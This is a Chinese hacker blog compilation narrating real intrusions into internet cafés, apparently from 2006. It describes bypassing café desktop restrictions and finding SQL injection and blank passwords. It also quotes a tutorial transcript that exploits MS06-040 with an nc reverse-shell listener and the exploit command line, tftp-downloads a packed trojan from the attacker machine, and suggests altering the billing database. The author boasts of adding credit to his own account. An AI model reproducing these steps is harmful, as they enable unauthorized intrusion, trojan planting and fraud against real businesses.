要是这点小问题都能难住我的话，我还怎么混呢？打开任务管理器，发现有个ProcessSafe.exe进程，看进程名感觉就是它搞的鬼。结束它，结果提示：

　　这也是预料之中的。如果它这么容易就被结束，我还写个屁啊？好了，费话少说。怎么干掉它？强大的ntsd还记得吗？ntsd -c q -p我可是一直记得。打开我的Nohacker2009，找到ProcessSafe的PID为496，路径为E:\NBMSClient。

　　ntsd -c q -p 496！提示等待30秒！
　　

　　30秒后进程被Kill了。我马上打开qvod，结果还是自动关闭。查看进程，发现ProcessSafe.exe又回来了，看下图，PID已经换成了2580。怎么办？右击进程，点击“定位到此进程文件”找到ProcessSafe.exe文件。

　　再来一下ntsd -c q -p 2580，30秒后马上删除ProcessSafe.exe，OK，搞定！再次打开Qvod下载页，没问题了，下载，安装，看电影喽！

　　Google也一样，反正每打开一张网页，上方都被插入了广告。

　　一般来说有两种情况吧，

　　一是有恶意程序在运行，监视到每打开一张网页都进行插入广告操作，这种可能比较小；

　　二是IE中加入恶意的BHO，也就是浏览器辅助对象，可能最大了。

　　分析好后，去除网页顶部的广告就变得很简单了。打开“管理加载项”找到陌生的BHO，把它禁用。或者用我的Nohacker勾选那个陌生的BHO，修复一下即可！

　　关闭浏览器，再重起就OK了！

　　那天由于是一早就过去挂号的，而我的专家门诊是在下午，所以我打算先到市一医院隔壁的网吧上下网，消磨点时间。第一次来杭州的网吧上网，不晓得有什么不一样的地方。很快就发现了，上网费就比我们这边贵多了，普通的液晶一个小时四块！

　　我这个人已经不可能像其同学一样上网安安心心地看看电影聊聊天或玩游戏，我总是要搞点什么东西，哪怕是这个时候上网只是来消磨下时间。我决定来看看杭州网吧的安全性、破破杭州网吧的限制。开机后，我发现使用的是虚拟桌面：

这很正常的~不过我很讨厌虚拟桌面，下载东西存放时很不方便。

用虚拟桌面我看不到盘符，在浏览里输入C：来打开C盘，如图：

难道系统盘不在C盘？找了其它几个盘，也不没发现系统盘~

打开文件夹选项查看，果然不出我所料，隐藏了。

可是我选中显示隐藏文件和系统文件后，发现C盘的内容还是照旧。再打开文件夹选项，发现隐藏系统文件和不显示隐藏文件又被自动打上勾了。真晕，这招是病毒的最爱，居然也用到网吧管理上面来了。

马上去改注册表，可是问题来了，现在是虚拟桌面，根本没有“运行”，CMD就更打不开了。其实搞这种网吧破解我觉得CMD是关键，只要能打开它，什么事都好办了。
这点倒是难不倒我，再怎么样你总不能限制我的IE浏览器吧！打开IE，直接文件–另存为，选择桌面：

看到真正的桌面了！上面还有个CMD，如何打开它？千万不要双击，而是要右击选择打开。打开之后我惊了一下，居然还要密码：

真是奇怪了，没事找事做~

马上自己来制作一个CMD，保存到桌面上。右击打开：

逃不掉了吧！

好了，CMD打开了，一切就好办了！
哪个电脑高手不精通CMD命令？可见CMD在系统中的确非常重要！

现在可以打开注册表了，把不显示隐藏文件的键值改过来，具体我不说了~

再修改文件夹，打开C盘，现在C盘文件全部显示出来，网管真的把系统文件夹全部隐藏了：

我们继续，看看还有什么限制，打开任务管理器，显示出来的却是这么一个古怪的画面：

真够牛的！居然把微软的任务管理器改造成了这副模样！真的是这样吗？不可能吧？！

这个任务管理器里的进程只能看，不能对它进行任务操作！

打开CMD，输入TASKMGR，打开的还是这个丑八怪任务管理器。

仔细思考，管理员不可能有这么高深的技术把系统自带的任务管理器改成这个样子的。我突然想到是怎么回事了，打开C盘，搜索一taskmgr，看结果：

system32下的333和444文件夹下居然也各有一个taskmgr！！

想到是怎么回事了吗？

对！333和444文件夹下的taskmgr应该才是真正的系统自带的任务管理器！

打开

真相大白了！

现在可以自由结束非系统进程了！

接下来做什么呢？能打开注册表，可以修改很多东西，这里不一一提了。

当我想把放我的文档里的破解截图都备份好一份想删除掉的时候，却删不掉，什么提示我忘了。晕哦，难道网管想抓我的“作案”证剧？

怎么删也删除不掉，更奇怪的是我重起了一下电脑，文档里我的截图居然没有被还原。网吧的系统盘不是都还原的吗？怪了！

我想到了“我的文档”可能不是在C盘了。打开属性一看，果然，

网管把它定位到了D盘的下载区文件夹里，这样做的目标很明显是为了用户文档里的东西在重起后不会丢失。由于这个文件夹是网吧服务器上某个盘的映射，好像没有权限删除，可是我在CMD下却将它删了：

破解得差不多了，接下来是我“反击”了。

DOWN下阿D网络工具包，一扫，看看返回了什么结果：

网吧还架设了电影服务器，可是通过检测我发现了明显的注入漏洞：

我没有再搞下去，因为我发现网管不断在我附近转。而且也时间不多了，我要回市一医院去看专家了，应该差不轮到我了。

最后还有点时间，我研究了一下虚拟桌面，试图突破。我发现这个东西受网管软件的控制的，去除不掉，不过我找出虚拟桌面上所有的文件，其实都是些快捷方式，如图：

感觉杭州的这个网吧比我们那边的网吧限制多很多，不过多台服务器出现空口令，电影网站存在注入漏洞，可见安全性也不怎么样。

网吧破解最重要的是学技术，而不是搞破坏，否则后果可能会很严重。

本次网吧破解之旅结束。

http://520hack.com/donghua/donghua4/200610/3002.html（链接已失效，郁闷~~）

　　动画教程文字说明如下：

大家好,我是野球小子,论坛ID:35483.我是嘉兴南湖学院的,在我们这里好像找不到一个志同道合学黑客技术的人,所以我非常希望能和大家一起交流学习.我的QQ75229219
我很少做动画,只索取却不做点贡献肯定是不行的,新世纪网安基地是个非常不错的学习乐园,希望大家多去光顾

好了,费话不多说,我们开始吧
现在是国庆长假,我是在家乡嵊州的红蜻蜓网吧
今天给大家做的是简单利用微软漏洞MS06040入侵网吧主机,关于MS06040我就不多说了,大家都应该了解的
下面看我操作吧

192.168.0.167我的IP
我们拿出MS06-040 Scanner对整个网吧进行扫描
扫描开始了,为了不浪费大家时间,我已经扫好了
看到这样的扫描结果就说明它存在漏洞
目标192.168.0.250
下面我们对它进行溢出
工具我都放在C盘了
nc -l -vv -p 888让NC监听888端口
下面我们再开一个CMD,用来进行溢出操作
ms06040rpc 192.168.0.250 192.168.0.167 888 1这是溢出命令,不用我多说了吧
看好了

C:\>nc -l -vv -p 888
listening on [any] 888 …
connect to [192.168.0.167] from PUBWINEP [192.168.0.250] 4877
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

溢出成功,看到了吧

下面我们给它传马儿,我用的是上兴
首先是配置,我们给它加个壳
好,接下去就上传我们的马儿
不好意思,我忘了准备上传工具
本地架设TFTP服务器,接下来在SHELL下上传,命令tftp -i 192.168.0.167 get 11.exe
因为我已经上传过一次11.exe,所以这次我们改个名
Transfer successful: 139776 bytes in 1 second, 139776 bytes/s这句都看得懂吧
我们运行一下服务端
最后我们打开上兴看看它上线没有
我们修改一下端口,我刚才用的是800端口
看到了吧,成功!192.168.0.250我们看看它的屏幕
哈哈,果然是网吧的主机
现在就可以下载它的数据库给自己加钱了,可惜我不是这个网吧的会员,所以我就不演示了
好了,教程就到这里吧,大家88

　　这次十一假期回家，上过家乡三个网吧（因为电脑搬去了学校，所以只好跑网吧），没想到都被我入侵了。我还做了其中一家网吧的会员，拿下主机给自己加了10块钱（不多的吧，只是学习学习，没有恶意搞破坏的哦）。这在半年前是想都不敢想的事，毕竟我的技术零起点还是在今天五一的那个长假。当时的我不要说黑客，对基本的网络技术都不一窍不通。一本去年11月份的黑客X档案激发我的兴趣，从此不发不可收拾，学得很认真，也付出了不少，还挂了课（要知道我大一上学期还拿奖学金，下学期居然挂了一门，当然也不全是因为学技术）这些说起来话就多了……现在在学校我好像成了一个小黑客了，呵呵，不过我知道跟网上的比我还差得远呢，我会不断努力的，伟伟，加油哈！
2006.10.6